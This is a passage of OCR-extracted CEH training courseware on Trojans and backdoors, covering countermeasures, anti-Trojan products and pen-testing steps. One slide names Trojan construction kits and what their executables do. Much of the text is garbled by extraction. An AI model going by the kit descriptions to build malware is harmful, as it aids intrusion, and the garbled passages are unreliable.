n e t w o r k a n d w ir e le s s n e t w o r k like 8 0 2 . 1 1 a / b / g / n Q M o n i t o r n e t w o r k b a n d w i d t h a nd usage b y c a p t u r i n g d a t a p a c k e t s t r a n s m i t t e d o v e r t h e n e t w o r k a n d p r o v id i n g s u m m a r y a n d d e c o d i n g i n f o r m a t i o n a b o u t th e s e p a c k e ts © V i e w n e t w o r k s ta tis tic s , a ll o w i n g easy c a p t u r e a nd i n t e r p r e t a t i o n o f n e t w o r k u t i li z a t i o n d a ta e M o n ito r In te rn e t, e m a il, and in s ta n t m e s s a g in g tra ffic , h e lp in g keep e m p lo y e e

p ro d u c tiv ity to a m a x im u m

M odule 06 Page 985

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

e

D ia g n o s e

and

p in p o in t

n e tw o rk

p ro b le m s

in

seconds

by

d e te c tin g

and

lo c a tin g

s u s p ic io u s h o s ts e M a p o u t t h e d e ta ils , in c lu d in g t r a f f i c , IP a d d re s s , a n d M A C , o f e ach h o s t o n t h e n e t w o r k , a ll o w i n g f o r easy i d e n t i f i c a t i o n o f e ach h o s t a n d t h e t r a f f i c t h a t passes t h r o u g h each © V is u a liz e t h e e n t i r e n e t w o r k in an e llip s e t h a t s h o w s t h e c o n n e c t i o n s a n d t r a f f i c b e t w e e n e ach h o s t

FIGURE 6.64: Detecting Trojans and Worms with Capsa Network Analyzer

M odule 06 Page 986

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Copyright © by

EG-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

M o d u le F lo w
So fa r, w e h a ve d iscu sse d v a r io u s T ro ja n s a n d t h e w a y s t h e y i n f e c t t h e s y s t e m r e s o u r c e s o r i n f o r m a t i o n s t o r e d o n t h e c o m p u t e r , as w e ll as w a y s t o d e t e c t T r o ja n s o n a c o m p u te r. Once you d e te c t a T ro ja n , you s h o u ld im m e d ia te ly d e le te it and a p p ly

c o u n t e r m e a s u r e s t h a t o f f e r p r o t e c t i o n a g a in s t T r o ja n s a n d b a c k d o o rs . T h e se c o u n t e r m e a s u r e s m in i m i z e risk a n d p r o v id e c o m p l e t e p r o t e c t i o n t o t h e u s e r's s y s te m .

Trojan Concepts

C ou n te rm e a su re s

(

Trojans Infection

|jjp |j|

Anti-Trojan Software Penetration Testing

!/—
V‫— ׳‬

Types of Trojans

f 1 Trojan Detection

M odule 06 Page 987

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

T his s e c tio n

h ig h lig h ts v a r io u s c o u n t e r m e a s u r e s t h a t p r e v e n t T r o ja n s a n d

backd oo rs fr o m

e n t e r i n g i n t o y o u r s y s te m .

M odule 06 Page 988

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Trojan C ounterm easures
A v o id o p e n in g e m a il a tta c h m e n ts re c e iv e d fro m u n k n o w n s e n d e rs

C EH

B lo c k a ll u n n e c e s s a ry p o rts a t th e h o s t a n d fir e w a ll

A v o id a c c e p tin g th e p ro g ra m s tra n s fe r r e d by in s ta n t m e s s a g in g

H a rd e n w e a k , d e fa u lt c o n fig u ra tio n s e ttin g s

D is a b le u n u s e d f u n c tio n a lit y in c lu d in g p ro to c o ls a n d s e rv ic e s

M o n it o r th e in te r n a l n e t w o r k tr a f fic f o r o d d p o rts o r e n c ry p te d tr a f fic

Copyright © by

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

T ro ja n C o u n te rm e a s u r e s
A T r o ja n is a m a lic io u s p r o g r a m t h a t m a s q u e r a d e s as a g e n u i n e a p p l i c a t i o n . W h e n th e s e T r o ja n s a re a c tiv a t e d , t h e y lead t o m a n y issues such as e ra s in g d a ta , r e p la c in g d a ta o n a v i c t i m ' s c o m p u t e r , c o r r u p t i n g file s, s p r e a d in g v iru s e s , a n d s p y in g o n t h e v i c t i m ' s s y s t e m a nd s e c r e tly r e p o r t i n g t h e d a ta , r e c o r d i n g k e y s tr o k e s t o s te a l s e n s itiv e i n f o r m a t i o n such as c r e d it c a rd n u m b e r , u s e r n a m e s , p a s s w o r d s e tc. a n d o p e n i n g a b a c k d o o r o n t h e v i c t i m ' s s y s te m f o r c a r r y in g o u t p r e c a r io u s a c tiv it ie s in t h e f u t u r e . In o r d e r t o p r e v e n t such a c tiv it ie s a n d r e d u c e t h e risks a g a in s t T ro ja n s , t h e f o l l o w i n g c o u n t e r m e a s u r e s h o u ld be a d o p t e d : 0 0 0 0 0 0 A v o id o p e n i n g e m a il a t t a c h m e n t s r e c e iv e d f r o m u n k n o w n s e n d e r s B lo ck all u n n e c e s s a r y p o r t s a t t h e h o s t a n d f i r e w a l l A v o id a c c e p tin g t h e p r o g r a m s t r a n s f e r r e d b y i n s t a n t m e s s a g in g H a r d e n w e a k , d e f a u l t c o n f i g u r a t i o n s e ttin g s D isab le u n u s e d f u n c t i o n a l i t y i n c lu d in g p r o t o c o l s a n d se rvice s M o n it o r th e in te rn a l n e tw o rk tra ffic fo r odd p o rts o r e n c ry p te d tra ffic

M odule 06 Page 989

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Trojan C ounterm easures
(Cont’d)
Avoid dow nlo adin g and executing applications fro m u n tru s te d sources Install patches and sec u rity updates fo r th e ope ratin g systems and applications Scan CDs and flo p p y disks w ith a n tiv iru s s o ftw a re before using

/ .Icitifwd

C EH
ittx jJ •U.U.

Avoid ty p in g th e com m ands b lindly and im ple m e n tin g pre-fa b rica te d program s o r scripts

M anage local w o rk s ta tio n file in te g rity thro u g h checksums, auditing, and p o rt scanning

Run host-based antivirus, fire w a ll, and in trusio n d etection softw are

Copyright © by

EG-Gouncil. All Rights ^gSen/ed.;Reproduction is Strictly Prohibited.

T r o j a n C o u n t e r m e a s u r e s ( C o n t ’d)
9 9 9 9

A v o id d o w n l o a d i n g a n d e x e c u t in g a p p li c a t i o n s f r o m u n t r u s t e d s o u rc e s In sta ll p a tc h e s a n d s e c u r it y u p d a t e s f o r t h e o p e r a t i n g s y s te m s a n d a p p lic a t io n s Scan CDs a n d f l o p p y disks w i t h a n t i v i r u s s o f t w a r e b e f o r e u sin g R e s tric t p e r m is s io n s w i t h i n t h e d e s k t o p e n v i r o n m e n t t o p r e v e n t m a lic io u s a p p li c a t i o n s i n s t a lla t io n

9

A v o id s c r ip ts

ty p in g th e

com m ands

b li n d l y a n d

im p le m e n tin g

p re -fa b ric a te d

p ro g ra m s o r

9

M a n a g e local w o r k s t a t i o n f ile i n t e g r i t y t h r o u g h c h e c k s u m s , a u d it in g , a n d p o r t s c a n n in g Run local v e rs io n s o f a n t iv ir u s , f i r e w a l l , a n d i n t r u s io n d e t e c t i o n s o f t w a r e o n t h e d e s k t o p

9

M odule 06 Page 990

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Backdoor Countermeasures
Most commercial anti-virus products can automatically scan and detect backdoor programs before they can cause damage

U rtifM

CEH
tUx*l IlMh•(

m

Educate users not to install applications downloaded from untrusted Internet sites and email attachments

Use anti-virus tools such as Windows Defender, McAfee, and Norton to detect and eliminate backdoors

Copyright © by

EG-G*ancil. All

Rights Reserved. Reproduction Is Strictly Prohibited.

B ack d o o r C o u n te rm e a su re s
P e rh a p s t h e o ld a d a g e " a n o u n c e o f p r e v e n t i o n is w o r t h a p o u n d o f c u r e " is r e l e v a n t h e r e . S o m e b a c k d o o r c o u n t e r m e a s u r e s a re : 0 The firs t lin e o f d e fe n s e is t o e d u ca te users r e g a r d in g th e d a n g e rs of in s t a llin g

a p p li c a t i o n s d o w n l o a d e d f r o m t h e I n t e r n e t , a n d t o be c a u t io u s if t h e y h a v e t o o p e n e m a il a t t a c h m e n t s . 0 T h e s e c o n d lin e o f d e fe n s e can be a n t i v i r u s p r o d u c t s t h a t a re c a p a b le o f r e c o g n iz in g T r o ja n s ig n a tu r e s . T h e u p d a t e s s h o u ld be r e g u la r ly a p p lie d o v e r t h e n e t w o r k . 0 The th ird lin e o f d e fe n s e c o m e s f r o m k e e p in g a p p li c a t i o n v e r s io n s u p d a t e d b y t h e

f o l l o w i n g s e c u r it y p a tc h e s a n d v u l n e r a b i l i t y a n n o u n c e m e n t s . Use a n t i v i r u s t o o l s such as W i n d o w s D e f e n d e r , M c A f e e , a n d N o r t o n t o d e t e c t a n d e l i m in a t e b a c k d o o rs .

M odule 06 Page 991

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

C o n s tr u c t T ro ja n

T ro ja n E x e c u tio n

T ro ja n H orse C o n s tr u c tio n Kits

Trojan Horse construction kits help attackers to construct Trojan horses of their choice

The tools in these kits can be dangerous and can backfire if not executed properly

T ro ja n H o rs e C o n s tr u c tio n K it P ro g e n ic M a il T ro ja n C o n s tr u c t io n K it - P M T P a n d o ra 's B o x

411

©
a v a ila b le in t h e w i ld are as f o l lo w s : 0

©
Copyright © by

EG-G*ancil. All

Rights Reserved. Reproduction Is Strictly Prohibited.

T ro ja n H o rs e C o n s tr u c tio n K its
T h e s e kits h e lp a t ta c k e r s c o n s t r u c t T r o j a n h o r s e s o f t h e i r c h o ic e . T h e t o o l s in th e s e kits can be d a n g e r o u s a n d can b a c k fir e if n o t e x e c u t e d p r o p e r l y . S o m e o f t h e T r o ja n kits

T h e T r o j a n H o r s e C o n s t r u c t i o n K it v 2 . 0 c o n s is ts o f t h r e e EXE file s : T h c k - tc .e x e , T h c k fp .e x e , a n d T h c k - tb c .e x e . T h c k .e x e is t h e a c tu a l T r o ja n c o n s t r u c t o r . W i t h th is c o m m a n d lin e u t i li t y , t h e a t t a c k e r can c o n s t r u c t a T r o ja n h o r s e o f his o r h e r c h o ic e . T h c k - fp .e x e is a file size m a n i p u l a t o r . W i t h th is , t h e a t t a c k e r can c r e a te file s o f a n y le n g t h , p ad o u t file s t o a s p e c ific le n g t h , o r e v e n a p p e n d a c e r ta in n u m b e r o f b y te s t o a file . T h c k - tb c .e x e w ill t u r n a n y C O M p r o g r a m i n t o a T im e B o m b .

Q

T h e P r o g e n ic M a i l T r o j a n C o n s t r u c t i o n K it ( P M T ) is a c o m m a n d - l i n e u t i l i t y t h a t a llo w s an a t t a c k e r t o c r e a t e an EXE ( P M .e x e ) t o se n d t o a v i c t i m .

0

P a n d o ra 's Box is a p r o g r a m d e s ig n e d t o c r e a t e T r o j a n s / t i m e b o m b s .

M odule 06 Page 992

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

M odule Flow

EH

Penetration Testing

^

Trojan Concepts

Anti-Trojan Software

Trojan Infection

**S

Countermeasures

Types of Trojans

Trojan Detection /
Copyright © by

EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

I M o d u le F lo w
lu §
P r io r t o th is , w e h a v e d iscu ss e d v a r io u s c o u n t e r m e a s u r e s t h a t o f f e r p r o t e c t i o n t o y o u r c o m p u t e r s y s te m a n d t h e i n f o r m a t i o n s t o r e d o n it a g a in s t v a r io u s m a l w a r e su ch as T r o j a n s a n d b a c k d o o r s . In a d d i t i o n t o th e s e , t h e r e is a n t i - T r o j a n s o f t w a r e t h a t can p r o t e c t y o u r c o m p u t e r s y s te m s a n d o t h e r i n f o r m a t i o n assets a g a in s t T r o ja n s a n d b a c k d o o rs . A n t i - T r o ja n s o f t w a r e d ea ls w i t h r e m o v i n g o r d e a c t i v a t i n g m a l w a r e .

Trojan Concepts

Countermeasures

,‫• נ‬

Trojans Infection ^

A n ti- T r o ja n S o ftw a re

s


Types of Trojans

Penetration Testing

v‫׳‬

f

‫י‬

Trojan Detection

T his s e c tio n lists a n d d e s c r ib e s v a r io u s a n t i - T r o ja n s o f t w a r e p r o g r a m s .

M odule 06 Page 993

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Anti-Trojan Software: TrojanHunter

CEH

TrojanHunter is an advanced malware scanner that detects all sorts of malware such as Trojans, spyware, adware, and dialers

TrojanHunter

M e m o ry s c a n n in g f o r d e te c tin g any m o d ifie d v a ria n t o f a p a r tic u la r b u ild o f a T ro ja n

' -L e T

x

File

View

Seen

J00I5

Help

FjlEcar

\

QjckScan

\

Update

Q

*

cLry TrojanHunter Now -Clcfc Here! Bat

R e g is try s c a n n in g fo r d e te c tin g tra c e s o f T roja ns in th e re g is try

!j ‫ט‬

b

In ifile s c a n n in g fo r d e te c tin g tra c e s o f Troja ns in c o n fig u ra tio n file s
^Char... Clow

O W

Fo>nd va» ‫ ו׳‬file: CAJser3\AdrhVkaoOeto\.K0i\TOT0Wx.cxcAJ0K.fyv1hwyb (Aocnt.2989) POJ10 VOtdn Ifc: C:V/rtJowstf ysWOM64y1‫׳‬CAFEE. EKE (RIshvare.TVtyPrcwv. IOC)

T ro ja n H u n te r G u a rd f o r re s id e n t m e m o ry scan n in g - d e te c t a n y T rojans if th e y m a n a g e t o s ta rt up

http ://www. trojanhunter. com
Copyright © by

EG-CMHCil. All

Rights Reserved. Reproduction Is Strictly Prohibited.

A n ti-T ro ja n S o ftw a re : T r o ja n H u n te r
S o u rc e : h t t p : / / w w w . t r o j a n h u n t e r . c o m T r o j a n H u n t e r is a m a l w a r e s c a n n e r t h a t d e t e c t s a n d r e m o v e s all s o rts o f m a l w a r e , such as T ro ja n s , s p y w a r e , a d w a r e , a n d d ia le rs , f r o m y o u r c o m p u t e r . S o m e o f T r o j a n H u n t e r ' s f e a t u r e s in c lu d e : 0 0 9 Q 0 9 H ig h -s p e e d file scan e n g in e c a p a b le o f d e t e c t i n g m o d i f i e d T r o j a n s M e m o r y s c a n n in g f o r d e t e c t i n g a n y m o d i f i e d v a r i a n t o f a p a r t i c u l a r b u ild o f a T r o ja n R e g is try s c a n n in g f o r d e t e c t i n g tr a c e s o f T r o ja n s in t h e r e g is t r y In ifile s c a n n in g f o r d e t e c t i n g tr a c e s o f T r o ja n s in c o n f i g u r a t i o n files P o r t s c a n n in g f o r d e t e c t i n g o p e n T r o ja n p o r ts T h e A d v a n c e d T r o ja n A n a ly z e r, an e x c lu s iv e f e a t u r e o f T r o j a n H u n t e r , is a b le w h o l e classes o f T r o ja n s u sin g a d v a n c e d s c a n n in g t e c h n i q u e s 0 T r o j a n H u n t e r G u a r d f o r r e s i d e n t m e m o r y s c a n n in g - d e t e c t a n y T ro ja n s if t h e y m a n a g e to s ta rt up 9 L iv e U p d a te u t i l i t y f o r e f f o r t l e s s r u le s e t u p d a t i n g via t h e I n t e r n e t to fin d

M odule 06 Page 994

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

9

Process list g iv in g d e ta ils a b o u t e v e r y r u n n i n g p ro c e s s o n t h e s y s te m , in c lu d in g t h e p a th t o t h e a c tu a l e x e c u t a b l e file

0

A c c u r a t e r e m o v a l o f all d e t e c t e d T ro ja n s - e v e n if t h e y a re r u n n i n g o r i f t h e T r o ja n has i n je c te d it s e lf i n t o a n o t h e r p ro c e s s

TrojanHunter
File V ie w Scan T o o ls H elp

L

j l

J

0
Full Scan Quick Scan Update

■h
Exit

a Buy TrojanHunter Now - Click Here!

Objects scanned: Trojans found:

147791 2

‫ > י‬, Clean.

Close

(U) Found trojan file: C:\Users\Admin\AppDataV- 0 cal\Tem pVjpx.exeAJpx.fyvzhwyb (Agent.2989)

10 Found trojan file: C:\W1ndows\$ysWOW64V>1CAFEE.EXE (Rjskware.TinyProxy. 100)

FIGURE 6.65: TrojanHunter Anti-Trojan Software

M odule 06 Page 995

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Anti-Trojan Software: Emsisoft Anti-Malware
E m s is o ft A n ti- M a lw a r e p r o v id e s PC p r o t e c t io n a g a in s t v iru s e s , T ro ja n s , s p y w a re , a d w a r e , w o r m s , b o ts , k e y lo g g e rs , a n d r o o t k it s T w o c o m b in e d s c a n n e rs f o r c le a n in g : A n ti- V ir u s a n d A n tiM a lw a r e T h r e e g u a r d s a g a in s t n e w in fe c t io n s : f ile g u a rd , b e h a v io r b lo c k e r, a n d s u r f p r o t e c tio n

CEH

Em sisoft
t=J

ANTI-MALWARE

SCAN COMPUTER
Scanned objects *97-163 Dctectcd objects: 317 Reno/eb objects: 0 Scanning: S a r'ro hcd‫־‬ Oiagntnn S J detected bcaticr?.. Ira ic J ta u a U Y lC f 5J (A) Gt We* gidptp^trdbcato'5■ ■ T ra ic J ta m tre J iM a iY r Svstan P m tn ifd £ Vicr J d c x :* d b ^ * jc r 3.. Troiaa.Gcncnu5515373 TO ) E \1zn Jde'.e.tedk>.3X> 5.. YD5.TroiaikNooUD (0) (E \tz r Jdc'.c. rd lo.aX f S.. JSJWCC(B) DrtaiK 62 registry keys ‫ ־‬ircdium ri^< 16 regstry keys ‫ ־‬mrdium rW c

a

B

I Scan finished!

f O

U Id

2 files ‫ ׳‬highrisk

‫&י‬

Id Id

2

If there* v j cbeer a n yM a lw a re foundonvowP C . rwi tan obtainrare rrfbraiatK Mon** oboute o chO ctcctrCM al*arc.
C ld< the 1M11 ■ of tie detected

fifes ■high risk

nalw arcto $ rc InarrwInow** w ndorv.

M jtp tc to ttcM *tH a v eb e e nd e te c te dd u r in gth e1

2 fits •Highrisk

Cltk o nV icv»0 1detected
the M fll^rtip nam e.

eocroorcnts !hat arc •cotcc » S ebct 01!o b je cts yo u/ran: to quatannrw !hendrfc^e T»1irt'M trr «H e r* eHrMerN"

locittorV ‫־‬ .o get a Kt o ' «1 kxjtd

© 2a03-2D:2ErKB=#r

ASout •ftc £ 0twa‫־‬e

http://www.emsisoft.com

Copyright © by EG-COBnci!. All Rights Reserved. Reproduction is Strictly Prohibited.

‫ץ‬

A n ti-T ro ja n S o ftw a re : E m s is o ft A n ti-M a lw a r e
S o u rc e : h t t p : / / w w w . e m s i s o f t . c o m

E m s is o ft A n t i - M a l w a r e p r o v id e s r e lia b le p r o t e c t i o n o f y o u r s y s t e m a g a in s t v a r io u s t h r e a t s such as v iru s e s , T ro ja n s , s p yw a re , adw are, w orm s, b o ts , k e y lo g g e rs , a nd ro o tk its . It has t w o

c o m b in e d s c a n n e rs ( a n t iv ir u s a nd a n t i - m a l w a r e ) f o r c le a n in g in f e c t i o n a nd t h r e e g u a rd s a g a in s t n e w in f e c t io n s : f ile g u a r d , b e h a v i o r b lo c k e r , a n d s u r f p r o t e c t i o n .

M odule 06 Page 996

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

E m s is o ft

A N TI-M A LW A R E
497483

&
r \

S C A N C O M P U T E R
Scanned objects:

Detected objects:

317

ijLigS
/ Removed objects: 0
A

S e a n n i n g : Scan finished!

PI p i

Diagnosis Trace.Reqistrv-Windows Password C A )
9 View all detected locations...

Details
62 registry keys - medium risk 16 registry keys - medium risk

Trace.Reaistrv.LCP 5.0 fA)
ffl View all detected locations... 5) View all detected locations...

Scan fin ishe d!
I f there has been any Malware found on your PC, you can obtain more information online about each detected Malware. Click the name o f the detected malware to view the description in a new browser window. Clide on "View all detected locations’ to get a list o f all found components th a t are related to the Malware name. Select all objects you w ant to quarantine and then didc the Oi iflrantinp v Ip rtp H n h ip rfc '

H T I Trace.Reaistrv.Proactive Svstem Password Re<15 reoistry keys - medium risk
|w‫| ׳‬ 0

Troian.Generic.5515373 (B)
ffl View all detected locations...

2 files - high risk 2 files - high risk

b
V

VBS.Troian.Noob.BfB)
ffl View all detected locations...

2 files - high risk 0 3&AXCCXB) Suspicious files have been detected during the scan.

© 2003-2012 Emsisoft

About this softw are

FIGURE 6 .6 6 : E m s is o ft A n ti- M a lw a r e

M odule 06 Page 997

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Anti-Trojan Softwares
Anti-Trojan Shield (ATS) a□ □
h ttp ://w w w .a tsh ie ld . com ----------‫ ד‬-

CEH

SPYWAREfighter
http ://w w w .spam fig hter.co m

p H

Spyware Doctor
h ttp ://w w w .p ctoo ls. com

Anti Trojan Elite
http://w w w .rem ove-trojan.com

Anti Malware BOCIean
h ttp ://w w w . com odo. com

V'

A

SUPERAntiSpyware
h ttp ://w w w .su perantispyw are.com

‫חך‬ - [n n|

Anti Hacker
http://w w w .hide-m y-ip.com

Trojan Remover
h ttp ://w w w .sim plysup. com

H

XoftSpySE
h ttp://w w w .paretologic.com

Twister Antivirus
http://w w w .filseclab .com

Copyright © by

EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

* A n ti-T ro ja n S o ftw are
A n t i - T r o ja n s o ftw a re p r o v id e s p ro te c tio n to your c o m p u te r s ys te m and th e i n f o r m a t i o n s t o r e d o n it by b lo c k in g v a r io u s m a lic io u s t h r e a t s such as T ro ja n s , w o r m s , viru s e s , b a c k d o o r s , m a lic io u s A c t iv e X c o n tr o ls , a n d Java a p p le t s t o e n t e r y o u r s y s te m . A f e w o f t h e a n t i T r o ja n s o f t w a r e p r o g r a m s t h a t a re used f o r t h e p u r p o s e o f k illin g m a l w a r e a re lis te d as f o l lo w s : 9 9 9 9 9 9 9 9 9 9 A n t i - T r o ja n Shield (ATS) a v a ila b le a t h t t p : / / w w w . a t s h i e l d . c o m S p y w a r e D o c t o r a v a ila b le a t h t t p : / / w w w . p c t o o l s . c o m A n t i M a l w a r e BOCIean a v a ila b le a t h t t p : / / w w w . c o m o d o . c o m A n t i H a c k e r a v a ila b le a t h t t p : / / w w w . h i d e - m v - i p . c o m XoftS pyS E a v a ila b le a t h t t p : / / w w w . p a r e t o l o g i c . c o m S P Y W A R E fig h te r a v a ila b le a t h t t p : / / w w w . s p a m f i g h t e r . c o m A n ti T r o ja n Elite a v a ila b le a t h t t p : / / w w w . r e m o v e - t r o i a n . c o m S U P E R A n tiS p y w a re a v a ila b le a t h t t p : / / w w w . s u p e r a n t i s p y w a r e . c o m T r o ia n R e m o v e r a v a ila b le a t h t t p : / / w w w . s i m p l y s u p . c o m T w is t e r A n t i v i r u s a v a ila b le a t h t t p : / / w w w . f i l s e c l a b . c o m
Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

M odule 06 Page 998

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

M odule Flow

EH

Trojan Concepts

Trojan Infection

**S

Countermeasures

Types of Trojans

Copyright © by

EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

M o d u le F lo w
As a p e n e t r a t i o n t e s t e r , y o u s h o u ld f o l l o w t h e s a m e s tr a t e g ie s as t h a t o f an a t t a c k e r t o t e s t y o u r n e t w o r k o r s y s te m a g a in s t T r o j a n a n d b a c k d o o r a t t a c k s . You s h o u ld p e r f o r m all t h e a v a ila b le a t t a c k in g t e c h n i q u e s in c lu d in g t h e n e w l y e m e r g e d a t t a c k in g t e c h n i q u e s . T his a llo w s y o u t o f i g u r e o u t t h e l o o p h o l e s o r v u l n e r a b i l it ie s in t h e t a r g e t o r g a n i z a t i o n 's s e c u r ity . If y o u fin d a n y v u ln e r a b i l it ie s o r lo o p h o le s , y o u s h o u ld s u g g e s t c o u n t e r m e a s u r e s t h a t can m a k e t h e o r g a n i z a t i o n 's s e c u r it y b e t t e r a n d s t r o n g e r .

Trojan Concepts

Countermeasures

,‫• נ‬

Trojans Infection

|||||r

Anti-Trojan Software

!/— V ‫—׳‬

Types of Trojans

P e n e t r a t i o n T e s t in g

‫י ץ‬

Trojan Detection

M odule 06 Page 999

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Pen Testing for Trojans and Backdoors
Use to o ls such as T C P V ie w a n d C u rrP o rts 0 0

CEH

Scan th e system fo r o p e n p o rts , ru n n in g processes, re g is try e n trie s , d e v ic e d riv e rs a n d services If a n y s u s p ic io u s p o rt, process, re g is try e n try , d e v ic e d riv e r o r s e rv ic e is d is c o v e re d , c h e c k th e a s s o c ia te d e x e c u ta b le file s

Scan for running Processes

Use to o ls such as W h a t's R u n n in g 0 Use to o ls such as j v l 6 P ow er Tools 2012 and PC Tools Registry M echanic

C o lle c t m o re in fo r m a tio n a b o u t th e s e fro m p u b lis h e r's w e b s ite s , if av a ila b le , a n d In te rn e t

Scan for registry entries

0

C heck if th e o p e n p o rts a re k n o w n to be o p e n e d b y T ro ja n s in w ild

Scan for device drivers installed on the computer

Use to o ls such as D r iv e rV ie w a n d D riv e r D e te c tiv e

Scan for Windows services

Use to o ls such as S rv M a n a n d S e rv iW in

Copyright © by

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

P e n T e s tin g fo r T r o ja n s a n d B a c k d o o r s
Step 1: Scan for open ports
O p e n p o r ts a re t h e p r i m a r y s o u r c e s t o la u n c h a tta c k s . T h e r e f o r e , in an a t t e m p t t o m a k e y o u r n e t w o r k s e c u re by c o n d u c t i n g p e n t e s tin g , y o u s h o u ld f i n d t h e o p e n p o r ts a n d p r o t e c t t h e m . You can f i n d t h e u n n e c e s s a r y o p e n p o r t s by s c a n n in g f o r o p e n p o r ts . For th is p u r p o s e , y o u can use t h e t o o l s such as T C P V ie w a n d C u r r P o r ts .

Step 2: Scan for running processes
M o s t T r o ja n s d o n ' t r e q u i r e t h e u se r t o s t a r t t h e p ro c e s s . T h e y s t a r t a u t o m a t i c a l l y a n d d o n ' t e v e n n o t i f y t h e user. T his k in d o f T r o ja n can be d e t e c t e d b y s c a n n in g f o r r u n n i n g p ro c e s s e s . In o r d e r t o scan f o r r u n n i n g p ro c esse s, y o u can use t o o l s such as W h a t 's R u n n in g , w h i c h scans y o u r s y s te m a n d lists all c u r r e n t l y a c tiv e p r o g r a m s , p ro cesse s, se rvices, m o d u le s , a n d n e t w o r k c o n n e c t i o n s . It a lso in c lu d e s sp e cia l a re as t o d is p la y s t a r t u p p r o g r a m s .

Step 3: Scan for registry entries
A f e w T ro ja n s ru n in t h e b a c k g r o u n d w i t h o u t a n y n o t i f i c a t i o n t o t h e s y s te m 's user. If y o u w a n t t o t e s t f o r su ch T ro ja n s , t h e n y o u s h o u ld scan f o r r e g is t r y e n tr ie s . This can be d o n e w i t h t h e h e lp o f to o l s such as JV P o w e r T o o ls a n d PC T o o ls R e g is try M e c h a n ic .

M odule 06 Page 1000

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Step 4: Scan for device drivers installed on the computer
In o r d e r t o c o n t r o l t h e h a r d w a r e , m o s t m o d e r n OSes use t h e i r o w n d e v ic e d riv e r s . A t t a c k e r s can ta k e a d v a n ta g e o f t h is s i t u a t i o n t o s p re a d T r o j a n s a n d b a c k d o o r s t h r o u g h d e v ic e d r i v e r file s. T r o ja n s s p re a d t h r o u g h d e v ic e d r iv e r s in f e c t t h e d e v ic e d r i v e r file s a n d o t h e r p ro cesse s.

Step 5: Scan for W indow s services
If y o u f i n d a n y o f t h e W i n d o w s s e rv ic e s s u s p ic io u s , t h e n c h e c k t h e a s s o c ia te d e x e c u ta b le files. T o scan W i n d o w s services, y o u can use t h e t o o l s such as S r v M a n a n d S e r v iW in .

M odule 06 Page 1001

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Step 6: Scan for startup programs
S o m e T r o ja n s ru n a u t o m a t i c a l l y w h e n y o u s t a r t W i n d o w s . T h e r e f o r e , scan f o r S t a r t u p p r o g r a m s u sin g t o o l s su ch as S ta r te r, S e c u r ity A u t o R u n , a n d A u t o r u n s a n d c h e c k t h e lis te d s t a r t u p p ro g ra m s and d e te rm in e if all t h e p rogram s in t h e list can be re c o g n iz e d w ith known f u n c t io n a l it ie s .

Step 7: Scan for files and folders
